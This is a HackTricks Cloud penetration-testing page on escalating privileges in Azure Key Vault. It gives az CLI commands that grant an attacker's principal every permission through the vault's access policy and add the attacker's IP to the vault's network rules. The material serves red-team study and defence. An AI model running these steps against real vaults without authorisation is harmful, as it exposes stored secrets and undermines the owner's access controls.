HackTricks CloudAz - Key Vault Privesc
Reading time: 2 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Key Vault
For more information about this service check:
Microsoft.KeyVault/vaults/write
An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC).
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>
# Get current principal ID
az ad signed-in-user show --query id --output tsv
# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all
Modify Network Restrictions
It might be possible tthat you have enough permissions th access sensitive data (like the value of a secret) but you can't access it because the key vault is restricted to a specific network. If you have the permission to modify the network restrictions you can add your IP to the list of allowed IPs.
# Get the current network restrictions
az keyvault network-rule list --name <vault-name>
# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.